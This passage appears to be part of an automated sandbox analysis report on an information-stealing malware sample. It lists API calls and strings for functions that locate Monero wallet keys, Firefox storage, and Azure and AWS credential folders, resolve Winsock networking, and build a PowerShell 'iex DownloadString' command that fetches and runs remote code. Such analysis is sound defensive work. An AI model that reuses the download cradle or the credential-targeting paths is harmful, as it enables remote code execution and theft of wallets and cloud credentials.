                          • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 00524547
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052456E
                          • lstrcpy.KERNEL32(00000000,?), ref: 005245A0
                          • GetFileAttributesA.KERNEL32(00000000), ref: 005245A7
                          • lstrcpy.KERNEL32(00000000,?), ref: 00524601
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052462A
                          • lstrcpy.KERNEL32(00000000,?), ref: 00524653
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052467B
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 005246AF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                          • String ID: .metadata-v2$\storage\default\
                          • API String ID: 1033685851-762053450
                          • Opcode ID: 213fb01b6bfd3a835c5580bf204ba2da8cd277b4d57b4cdcd35bdbe97b8d2c3d
                          • Instruction ID: 4d2074b4781d197ed7ff4abba3e8e108e5da38aa10a6d71aaa898c6306d6099f
                          • Opcode Fuzzy Hash: 213fb01b6bfd3a835c5580bf204ba2da8cd277b4d57b4cdcd35bdbe97b8d2c3d
                          • Instruction Fuzzy Hash: 28B17031A116279BEB21EF78EC49AAF7FA9BF42700F045124B845E7291DB74DC918F90
                          Function 005257A0 Relevance: 45.5, APIs: 30, Instructions: 486stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 005257D5
                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00525804
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00525835
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052585D
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00525868
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00525890
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005258C8
                          • lstrcat.KERNEL32(00000000,00000000), ref: 005258D3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005258F8
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0052592E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00525956
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00525961
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00525988
                          • lstrlen.KERNEL32(00541794), ref: 0052599A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005259B9
                          • lstrcat.KERNEL32(00000000,00541794), ref: 005259C5
                          • lstrlen.KERNEL32(011ACFC8), ref: 005259D4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005259F7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00525A02
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00525A2C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00525A58
                          • GetFileAttributesA.KERNEL32(00000000), ref: 00525A5F
                          • lstrcpy.KERNEL32(00000000,?), ref: 00525AB7
                          • lstrcpy.KERNEL32(00000000,?), ref: 00525B2D
                          • lstrcpy.KERNEL32(00000000,?), ref: 00525B56
                          • lstrcpy.KERNEL32(00000000,?), ref: 00525B89
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00525BB5
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00525BEF
                          • lstrcpy.KERNEL32(00000000,?), ref: 00525C4C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00525C70
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                          • String ID:
                          • API String ID: 2428362635-0
                          • Opcode ID: 9eea5a97f57a6a548242e9725850454882c4c78b4dc5244c6207cf0a522170a5
                          • Instruction ID: 477bbd49976170a03575e1458d5823d7dbf06470ffc1fc375c7d15ab8f89ce9c
                          • Opcode Fuzzy Hash: 9eea5a97f57a6a548242e9725850454882c4c78b4dc5244c6207cf0a522170a5
                          • Instruction Fuzzy Hash: C802C371A1161A9BDB21EF78E889AEF7FB5BF45300F144129F905A7290EB34DC85CB90
                          Function 00511190 Relevance: 42.3, APIs: 22, Strings: 2, Instructions: 280stringfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00511120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00511135
                            • Part of subcall function 00511120: RtlAllocateHeap.NTDLL(00000000), ref: 0051113C
                            • Part of subcall function 00511120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00511159
                            • Part of subcall function 00511120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00511173
                            • Part of subcall function 00511120: RegCloseKey.ADVAPI32(?), ref: 0051117D
                          • lstrcat.KERNEL32(?,00000000), ref: 005111C0
                          • lstrlen.KERNEL32(?), ref: 005111CD
                          • lstrcat.KERNEL32(?,.keys), ref: 005111E8
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0051121F
                          • lstrlen.KERNEL32(011A8A20), ref: 0051122D
                          • lstrcpy.KERNEL32(00000000,?), ref: 00511251
                          • lstrcat.KERNEL32(00000000,011A8A20), ref: 00511259
                          • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 00511264
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511288
                          • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00511294
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005112BA
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 005112FF
                          • lstrlen.KERNEL32(011ACF20), ref: 0051130E
                          • lstrcpy.KERNEL32(00000000,?), ref: 00511335
                          • lstrcat.KERNEL32(00000000,?), ref: 0051133D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511378
                          • lstrcat.KERNEL32(00000000), ref: 00511385
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005113AC
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 005113D5
                          • lstrcpy.KERNEL32(00000000,?), ref: 00511401
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051143D
                            • Part of subcall function 0052EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0052EE12
                          • DeleteFileA.KERNEL32(?), ref: 00511471
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                          • String ID: .keys$\Monero\wallet.keys
                          • API String ID: 2881711868-3586502688
                          • Opcode ID: ee8779f3921bed15e1c99d61e3bf1bfbddee559fa1eb9fd03f4a3baf8a670ae9
                          • Instruction ID: f220d7c05abc5fd7fcf2e3a079ba23286251507deb56f9243fbd3caeaa783a31
                          • Opcode Fuzzy Hash: ee8779f3921bed15e1c99d61e3bf1bfbddee559fa1eb9fd03f4a3baf8a670ae9
                          • Instruction Fuzzy Hash: B4A1A075A0060A9BEB21EBB4DC89ADE7FB9BF85700F044464FA05E7251DB34DDC18B98
                          Function 0052E720 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 199stringCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 0052E740
                          • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0052E769
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052E79F
                          • lstrcat.KERNEL32(?,00000000), ref: 0052E7AD
                          • lstrcat.KERNEL32(?,\.azure\), ref: 0052E7C6
                          • memset.MSVCRT ref: 0052E805
                          • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0052E82D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052E85F
                          • lstrcat.KERNEL32(?,00000000), ref: 0052E86D
                          • lstrcat.KERNEL32(?,\.aws\), ref: 0052E886
                          • memset.MSVCRT ref: 0052E8C5
                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0052E8F1
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052E920
                          • lstrcat.KERNEL32(?,00000000), ref: 0052E92E
                          • lstrcat.KERNEL32(?,\.IdentityService\), ref: 0052E947
                          • memset.MSVCRT ref: 0052E986
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$memset$FolderPathlstrcpy
                          • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                          • API String ID: 4067350539-3645552435
                          • Opcode ID: 0e9e13dc5edad4060f6699ed25bbdbe64d318b24b244d5ff71fd02623b90f9e3
                          • Instruction ID: bd6fd7035aa010ebb1a2dc4f025fcf034e03e144c949f07375a3edb9ef8d9dd1
                          • Opcode Fuzzy Hash: 0e9e13dc5edad4060f6699ed25bbdbe64d318b24b244d5ff71fd02623b90f9e3
                          • Instruction Fuzzy Hash: FC71E971A90229ABEB21EB64DC4AFED7B74BF49700F004494B719AB1C1DBB49AC48F54
                          Function 0052ABB2 Relevance: 39.3, APIs: 25, Strings: 1, Instructions: 297stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32 ref: 0052ABCF
                          • lstrlen.KERNEL32(011AD9F0), ref: 0052ABE5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052AC0D
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0052AC18
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052AC41
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052AC84
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0052AC8E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052ACB7
                          • lstrlen.KERNEL32(00544AD4), ref: 0052ACD1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052ACF3
                          • lstrcat.KERNEL32(00000000,00544AD4), ref: 0052ACFF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052AD28
                          • lstrlen.KERNEL32(00544AD4), ref: 0052AD3A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052AD5C
                          • lstrcat.KERNEL32(00000000,00544AD4), ref: 0052AD68
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052AD91
                          • lstrlen.KERNEL32(011ADBB8), ref: 0052ADA7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052ADCF
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0052ADDA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052AE03
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052AE3F
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0052AE49
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052AE6F
                          • lstrlen.KERNEL32(00000000), ref: 0052AE85
                          • lstrcpy.KERNEL32(00000000,011ADB70), ref: 0052AEB8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen
                          • String ID: f
                          • API String ID: 2762123234-1993550816
                          • Opcode ID: 8a952aaddb101272309ede3a645568a8fdf013aeb3a919953322607b09d972de
                          • Instruction ID: c253ba006a7b1974e6506a421f63115238024ed6e9048fcd86a5d244026e618c
                          • Opcode Fuzzy Hash: 8a952aaddb101272309ede3a645568a8fdf013aeb3a919953322607b09d972de
                          • Instruction Fuzzy Hash: 2AB181309115279BDB22EB78EC4DAAFBBBABF82700F044425B80197291DB74DD91CB91
                          Function 005347E0 Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 48libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(ws2_32.dll,?,005272A4), ref: 005347E6
                          • GetProcAddress.KERNEL32(00000000,connect), ref: 005347FC
                          • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 0053480D
                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0053481E
                          • GetProcAddress.KERNEL32(00000000,htons), ref: 0053482F
                          • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 00534840
                          • GetProcAddress.KERNEL32(00000000,recv), ref: 00534851
                          • GetProcAddress.KERNEL32(00000000,socket), ref: 00534862
                          • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00534873
                          • GetProcAddress.KERNEL32(00000000,closesocket), ref: 00534884
                          • GetProcAddress.KERNEL32(00000000,send), ref: 00534895
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                          • API String ID: 2238633743-3087812094
                          • Opcode ID: 71e50aebdc9ca4cc52202d739b4a8badff4ae6f0373d9c1161778aa50233eac7
                          • Instruction ID: b0fd3ce7277c3f3b7c3eb333f09740743cd367f6355460f40751d40461235bee
                          • Opcode Fuzzy Hash: 71e50aebdc9ca4cc52202d739b4a8badff4ae6f0373d9c1161778aa50233eac7
                          • Instruction Fuzzy Hash: AF11EF79951735EBC7509FB4AC0EA9A3EB8BA0B709304981BF291D2171FBFD4400DB59
                          Function 0052BE20 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 203stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0052BE53
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0052BE86
                          • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0052BE91
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052BEB1
                          • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0052BEBD
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052BEE0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0052BEEB
                          • lstrlen.KERNEL32(')"), ref: 0052BEF6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052BF13
                          • lstrcat.KERNEL32(00000000,')"), ref: 0052BF1F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052BF46
                          • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0052BF66
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052BF88
                          • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0052BF94
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052BFBA
                          • ShellExecuteEx.SHELL32(?), ref: 0052C00C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          • API String ID: 4016326548-898575020
                          • Opcode ID: 6eae7a4aedfb1527bdf06a969b02499e4cb77351633e10ba37b28edfb3c440ad
                          • Instruction ID: b53ed801f287d84fa0d8faddecd05558089438b7aa2450b3a8d0d0eb74edaf28
                          • Opcode Fuzzy Hash: 6eae7a4aedfb1527bdf06a969b02499e4cb77351633e10ba37b28edfb3c440ad
                          • Instruction Fuzzy Hash: D861D431A1022A9BEB21AFB5AC8DAEF7FB9BF46300F004425F505E7251DB34C9918F91
                          Function 00531820 Relevance: 31.5, APIs: 25, Instructions: 269stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0053184F
                          • lstrlen.KERNEL32(01196188), ref: 00531860
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00531887
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00531892
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005318C1
                          • lstrlen.KERNEL32(00544FA0), ref: 005318D3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005318F4
                          • lstrcat.KERNEL32(00000000,00544FA0), ref: 00531900
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0053192F
                          • lstrlen.KERNEL32(01196028), ref: 00531945
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0053196C
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00531977
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005319A6
                          • lstrlen.KERNEL32(00544FA0), ref: 005319B8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005319D9
                          • lstrcat.KERNEL32(00000000,00544FA0), ref: 005319E5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00531A14
                          • lstrlen.KERNEL32(01196038), ref: 00531A2A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00531A51
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00531A5C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00531A8B
                          • lstrlen.KERNEL32(01196078), ref: 00531AA1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00531AC8
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00531AD3
